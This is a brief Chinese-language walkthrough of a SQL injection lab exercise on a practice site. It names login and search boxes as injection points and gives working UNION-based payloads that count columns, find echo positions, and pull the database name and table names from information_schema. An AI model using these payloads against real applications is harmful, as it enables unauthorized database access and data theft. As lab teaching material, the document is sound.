post注入高危点:
登录框
查询框
各种和数据库有交互的框
http://inject2b.lab.aqlab.cn:81/Pass-05/index.php
尝试使用万能密码登录:
如下图,成功使用万能密码登录
接下来的操作就和之前的get注入一样了。
1.order by 获取字段数
y’ or 1=1 order by 3-- qwe 得到字段数为3
2.使用联合查询union回显数据
y’ and 1=1 union select 1,2,3-- qwe
获取回显位置 在 2,3
获取数据库名:
y’ and 1=1 union select 1,2,database()-- qwe
数据库:post_error
获取表名:
y’ and 1=1 union select 1,2,table_name from information_schema.tables where table_schema=database() limit 0,1-- qwe
接下来获取字段名:
省略